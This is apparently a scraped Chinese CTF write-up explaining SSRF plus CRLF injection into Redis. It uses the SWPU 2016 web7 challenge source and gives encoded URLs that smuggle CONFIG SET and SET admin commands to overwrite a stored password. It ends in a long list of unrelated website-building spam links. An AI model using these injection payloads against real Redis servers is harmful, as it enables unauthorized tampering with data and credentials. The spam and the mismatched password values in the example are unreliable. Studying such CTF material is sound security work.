当前位置: 首页 > news >正文

广州白云做网站的公司网站设计 导航条

news 2026/4/28 18:19:42
广州白云做网站的公司,网站设计 导航条,为什么都说2024年房价降,湛江做网站需要什么文章目录 注入原理例题 [SWPU 2016]web7 注入原理 参考文章 应用场景是具有SSRF漏洞#xff0c;结合CRLF注入 我们以redis数据库为例#xff0c;当存在SSRF时我们伪造以下请求 http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%… 文章目录 注入原理例题 [SWPU 2016]web7 注入原理 参考文章 应用场景是具有SSRF漏洞结合CRLF注入 我们以redis数据库为例当存在SSRF时我们伪造以下请求 http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0a:6379/foo解码一下执行过程就是将修改Redis的工作目录为 /tmp然后修改Redis的数据库文件名为 evil路径为默认端口的/foo http://127.0.0.1 CONFIG SET dir /tmp CONFIG SET dbfilename evil :6379/foo然后就可以执行相关操作比如修改用户的密码 再次利用ssrf漏洞进行修改并保存 http://127.0.0.1%0d%0aset%20admin%20admin%0d%0asave%0d%0a:6379/foo解码结果如下 http://127.0.0.1 set admin 123456 save :6379/foo例题 [SWPU 2016]web7 源码 #!/usr/bin/python # coding:utf8__author__ niexinmingimport cherrypy import urllib2 import redisclass web7:cherrypy.exposedef index(self):return script window.location.href/input;/scriptcherrypy.exposedef input(self,url,submit):fileopen(index.html,r).read()reheadersif cherrypy.request.methodGET:reheaderselse:urlcherrypy.request.params[url]submitcherrypy.request.params[submit]try:for x in urllib2.urlopen(url).info().headers:reheadersreheadersxbrexcept Exception,e:reheaders错误str(e)for x in urllib2.urlopen(url).info().headers:reheadersreheadersxbrfilefile.replace(?response?,reheaders)return filecherrypy.exposedef login(self,password,submit):pool redis.ConnectionPool(host127.0.0.1, port6379)r redis.Redis(connection_poolpool)refileopen(login.html,r).read()if cherrypy.request.methodGET:reelse:passwordcherrypy.request.params[password]submitcherrypy.request.params[submit]if r.get(admin)password:reopen(flag,r).readline()else:reCant find admin:password,fast fast fast.....filefile.replace(?response?,re)return file cherrypy.config.update({server.socket_host: 0.0.0.0,server.socket_port: 8080,}) cherrypy.quickstart(web7(),/)可以看到引入urllib2模块题目逻辑比较清晰就是要登录admin才能获取flagadmin的密码就在redis数据库中然后input中使用了urllib2.open().info().headers应该是可以利用SSRF来注入redis修改admin的密码的。 我们直接修改密码redis默认端口为6379 http://127.0.0.1%0d%0aset%20admin%20123456%0d%0a:6379//解码如下 http://127.0.0.1 set admin 123456 :6379
http://www.hkea.cn/news/14451499/

相关文章:

  • 网络维护网站美工学生简单个人主页模板
  • 网站备案号信息做设计找图片的网站有哪些
  • 烟台电子商务网站建设成都网站设计公司电话
  • php购物网站开发文档中国外贸出口网站
  • 福州专业网站制作国家企业信用信息
  • 商城网站模板抖店推广
  • 如何让自己做的网页有网站乐山市规划和建设局网站
  • 沈阳网站建设公众号合肥seo结算
  • 国内做AI视频网站免费观看wordpress live-calendar
  • 怎样监测熊掌号绑定成功网站网站规划建设前期规划方案
  • 网站建设报价表模板下载太原 网站建设公司
  • 手机网站 禁止缩放百度竞价渠道代理
  • 做电子简历的网站百度搜一下
  • 广州设计周官方网站家庭电脑做网站
  • 科技馆网站建设方案个人网站写什么好
  • 河南省和城乡建设厅网站首页什么网站ghost做的好
  • 做搜狗网站点击开淘宝网店的全流程
  • 直接进网站的浏览器百度数据指数
  • 苏州市住房城乡建设局网站首页mifa网站开发费用
  • 手机自媒体网站模板做视频up主视频网站
  • 同性男做性视频网站代码判断网站
  • 做水果的网站小鸟云WordPress数据库连接
  • 新野微网站开发100个创意创业项目
  • 制作简易网站外贸网站建设哪家有名
  • 徐州英才网最新招聘信息seo文案范例
  • 网站怎么做301重定向设计家官网室内设计
  • 用表格做网站教程wordpress页面添加分类
  • 抚顺做网站的公司30个适合大学生创业的项目
  • 网站建设后如何检测合肥工程建设网站
  • 设计网站公司名称百度seo公司